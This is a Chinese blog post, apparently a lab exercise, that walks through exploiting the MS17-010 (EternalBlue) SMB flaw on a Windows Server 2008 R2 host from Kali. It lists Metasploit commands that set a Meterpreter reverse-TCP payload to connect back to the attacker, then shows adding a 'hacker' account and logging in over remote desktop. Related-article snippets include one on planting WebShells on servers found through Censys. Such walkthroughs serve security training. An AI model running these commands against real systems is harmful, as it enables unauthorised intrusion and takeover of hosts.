永恒之蓝--Windows server 2008R2

最新推荐文章于 2023-07-29 10:55:19 发布
最新推荐文章于 2023-07-29 10:55:19 发布
阅读量824 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 安全 web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/121586804
版权

任务目标:通过ms17-010漏洞模块实战入侵win08R2主机

拓扑结构:

windows server 2008 IP地址信息:100.69.250.93

kali linux IP地址信息:100.69.244.203

1:查看主机的IP地址

image.png

 2:使用Nmap对目标主机进行网络扫描

image.png

image.png

 3:启动MSF漏洞利用工具并进行漏洞利用

image.png

 主要的命令:

1 Use exploit/windows/smb/ms17_010_eternalblue   //调用漏洞利用模块
2 Set RHOST 目标IP地址    //设置攻击目标的IP地址
3 Set LHOST 攻击者IP地址  //设置反弹的IP地址,即攻击者的本地IP地址
4 Set payload windows/x64/meterpreter/reverse_tcp   //设置攻击载荷
5 Exploit     //漏洞攻击

image.png

image.png

 得到临时的回话;创建用户hacker

image.png

另起一个窗口,使用我们刚才创建的账户进行远程桌面连接:

命令:rdesktop 目标IP地址

image.png

 结束

种树人1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2008 r2 server 提权_某次Windows渗透提权过程
weixin_39624071的博客
12-19 1589
0x01物色目标大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集,所以Censys、Shodan、Zoomeye就不会那么灵敏了。 首先在Censys中利用敏感路经找到了一堆服务器,挑了几个看起来顺眼的利用某代码执行漏洞写入WebShell ...
永恒之(ms17-010)复现对win7与win server2008 R2渗透
最新发布
Lzcsfg的博客
04-10 1442
在虚拟机中安装关闭win7与win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
利用永恒之漏洞拿到Windows Server2008的权限
m0_73965301的博客
07-29 377
永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。3.search ms17搜索模块,扫描445端口在线主机 ,MS17_010漏洞利用需要开放445 smb服务。也可以理解为可利用的模块。
Windows server 2008 R2配置路由和***
Leo's Blog
11-13 941
添加角色,安装“网络策略和访问服务”,选中“路由和远程访问服务”。打开控制面板–管理工具–路由和远程访问,在计算机名上面点右键,选择“配置并启用路由和远程访问”。选择配置的时候一定要选择“自定义配置”:然后配置项选择×××访问、NAT和LAN路由最后可能会提醒你防火墙方面的设置要更改,先不管,配置好了再说防火墙。根据提示,选择启动服务下面进行具体设置,计算机名上点右键,选属性...
方程式工具-永恒之 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之)[原理扫描] 【3】Microsoft Windows SMB...
win2012R2永恒之安全补丁.zip
05-12
《Windows Server 2012 R2与永恒之安全补丁详解》 在网络安全领域,永恒之(EternalBlue)是一个具有里程碑意义的漏洞,它曾被广泛利用于 WannaCry 勒索软件攻击中,对全球范围内的Windows系统造成了严重威胁。...
windows server 2008 r2 安装驱动
04-25
在Windows Server 2008 R2操作系统中,安装驱动程序是系统配置的重要步骤,尤其对于服务器级系统来说,正确安装驱动能确保硬件的最佳性能和稳定性。以下将详细讲解安装驱动的相关知识点: 1. **驱动程序的作用**:...
windows server 2008 r2 托管 net core 程序补丁 Windows6.1-KB2533623-x64
04-01
在IT行业中,Windows Server 2008 R2是一个广泛使用的服务器操作系统,它为企业提供了稳定且功能丰富的平台来运行各种应用程序。随着技术的发展,.NET Core成为了一个跨平台的开发框架,允许开发者在Windows Server ...
windows server 2008 R2 安装oracle rac集群
03-12
此资源是一个压缩文件,其中包含:windows-2008+Oracle-11g-R2-故障转移群集配置完整版.doc、Oracle-11G-(11.2.0.3)RAC配置指导-for-Windows-2008-R2(已测试).docx、Windows-Server-2008-R2-X64环境下Oracle-11g-R2-...
如何检查有哪些尝试入侵服务器IP?有哪些命令?
sbyntdx的博客
12-03 1059
相信在用云服务器建站之后的维护过程中,检查服务器是否被入侵是每一个站长都会特别关注的事项。我自己用的是小鸟云香港云服务器(性能还是比较稳定的),有免费防御提供也可以自己调高防御,最近有一次被ddos攻击,还好峰值在防御的范围内,属于有惊无险,找技术的时候也很热心帮忙解决问题https://www.niaoyun.com/#/?utm_source=qdl-1203。出于安全考虑(以防万一),我还是整理了一些检查服务器是否被入侵的小方法,仅供参考。 一、安装杀毒软件(例如:360安全卫士、火绒安全,电脑
Windows Server 2008 R2更新永恒之 补丁包方法
weixin_41123024的博客
01-19 1万+
Windows Server 2008 R2更新永恒之 补丁包方法
永恒之--漏洞修补
chang113的博客
06-20 1284
永恒之--漏洞修补
Windows下永恒之(MS17-010)漏洞的复现分析
qq_51331767的博客
01-11 1910
Windows下的MS17-010(永恒之)的复现与分析
Windows中如何查看日志(如查看远程登陆的IP地址)以及常用日志ID
热门推荐
小C的博客
12-12 6万+
【时间】2018.12.12 【题目】Windows中如何查看日志(如查看远程登陆的IP地址)以及常用日志ID 概述 在Windows中可以使用 事件查看器 来查看相关日志,并结合日志ID进行日志筛选。常见的日志有: 4634 - 帐户被注销   4647 - 用户发起注销   4624 - 帐户已成功登录(可以查看   4625 - 帐户登...
针对windows server 2008R2 复现永恒之漏洞(命令行操作)
m0_50505929的博客
03-31 2432
kali渗透windows server 2008 R2 永恒之 linux:kali Linux windows:windows server 2008 R2 确认进入kali的root 进入kali的msf:msfconsole 使用可用端口模块:use auxiliary/scanner/smb/smb_version 查看需要设置的参数:show options yes为需要设置的参数,no无需设置 设置目标主机地址:set rhosts 192.168.205.150 设置线程数:set
windows 2008 CVE-2017-0148 方程式工具-永恒之 修复
陈洋的博客
04-26 3988
windows 2008 CVE-2017-0148 方程式工具-永恒之 修复 windows 2008R2 445端口 - 注册表禁用SMB服务 禁用SMBv1 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Valu...
Windows2008R2下用PHP-Manager对PHP配置.docx
11-28
在Windows Server 2008 R2操作系统中,管理和配置PHP环境通常是一项繁琐的任务,尤其是当涉及到修改PHP配置文件php.ini时。PHP-Manager是一个非常实用的工具,它为IIS管理员提供了一个图形化的用户界面,使得配置PHP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值